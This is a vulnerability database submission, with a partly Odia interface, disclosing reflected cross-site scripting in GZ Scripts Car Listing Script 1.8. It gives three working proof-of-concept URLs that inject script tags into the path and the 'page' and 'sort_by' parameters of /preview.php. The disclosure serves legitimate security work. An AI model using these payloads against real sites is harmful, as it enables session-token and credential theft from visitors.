ଜମା କରନ୍ତୁ #175881: Car Listing Script 1.8 - Reflected XSSସୂଚନା

ଶୀର୍ଷକ	Car Listing Script 1.8 - Reflected XSS
ବର୍ଣ୍ଣନା	Author : skalvin aka (CraCkEr) Date : 29/06/2023 Website : https://gzscripts.com/car-listing-script-php.html Vendor : GZ Scripts Software : Car Listing Script 1.8 Vuln Type: Reflected XSS Impact : Manipulate the content of the site Release Notes: The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /preview.php URL parameter is vulnerable to RXSS http://website/preview.php/n42rk"><script>alert(1)</script>i2rgn?controller=GzFront&action=detail&car_id=10 Path: /preview.php GET 'page' parameter is vulnerable to RXSS http://website/preview.php?&page=tdnzc%22%3e%3cscript%3ealert(1)%3c%2fscript%3eq4n0s&sort_by=old_listing Path: /preview.php GET 'sort_by' parameter is vulnerable to RXSS http://website/preview.php?&page=1&sort_by=bpei5%22%3e%3cscript%3ealert(1)%3c%2fscript%3erfgo3 [-] Done
ଉପଭୋକ୍ତା	skalvin (UID 49463)
ଦାଖଲ	06/29/2023 08:02 PM (3 ବର୍ଷ ବର୍ଷ ago)
ମଧ୍ୟମ ଧରଣର	07/08/2023 01:51 PM (9 days later)
ସ୍ଥିତି	ଗ୍ରହଣ କରାଯାଇଛି
VulDB ଏଣ୍ଟ୍ରି	233350 [GZ Scripts Car Listing Script PHP 1.8 /preview.php page/sort_by କ୍ରସ୍ ସାଇଟ୍ ସ୍କ୍ରିପ୍ଟିଂ]
ପଏଣ୍ଟ	17

Interested in the pricing of exploits?

See the underground prices here!